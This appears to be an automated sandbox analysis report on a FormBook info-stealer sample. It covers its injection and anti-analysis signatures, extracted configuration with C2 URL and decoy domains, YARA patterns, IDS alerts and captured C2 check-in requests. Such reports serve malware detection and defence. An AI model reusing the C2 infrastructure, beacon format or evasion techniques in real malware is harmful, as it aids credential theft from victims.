Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 457b22da_by_Libranalysis

Overview

General Information

Sample Name:457b22da_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412121
MD5:457b22da77d4db093a31dd80a4b8963f
SHA1:83dc32633108d309f6b6b50a42dc102e7375f54c
SHA256:8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 457b22da_by_Libranalysis.exe (PID: 4120 cmdline: 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: 457B22DA77D4DB093A31DD80A4B8963F)
    • 457b22da_by_Libranalysis.exe (PID: 5452 cmdline: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 852 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5448 cmdline: /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.457b22da_by_Libranalysis.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.457b22da_by_Libranalysis.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.457b22da_by_Libranalysis.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 852

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 457b22da_by_Libranalysis.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 457b22da_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 457b22da_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 457b22da_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 457b22da_by_Libranalysis.exe, rundll32.exe
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 34.95.69.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 156.252.96.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 184.168.131.241:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rogegalmish.com/a8si/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.thepocket-onlinelesson.xyz
          Source: C:\Windows\explorer.exeDNS query: www.tracisolomon.xyz
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1Host: www.skynetaccess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1Host: www.shirleyeluiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1Host: www.drisu-goalkeeping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1Host: www.rogegalmish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1Host: www.best-cleaner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1Host: www.omfgphil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1Host: www.skynetaccess.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1Host: www.shirleyeluiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1Host: www.drisu-goalkeeping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1Host: www.rogegalmish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1Host: www.best-cleaner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1Host: www.omfgphil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.skynetaccess.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 10:25:46 GMTServer: Apache/2.4.46 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: explorer.exe, 00000005.00000000.263565575.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/1
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/downloads/
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/index_ru.html
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/index_ru.htmlc
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmpString found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
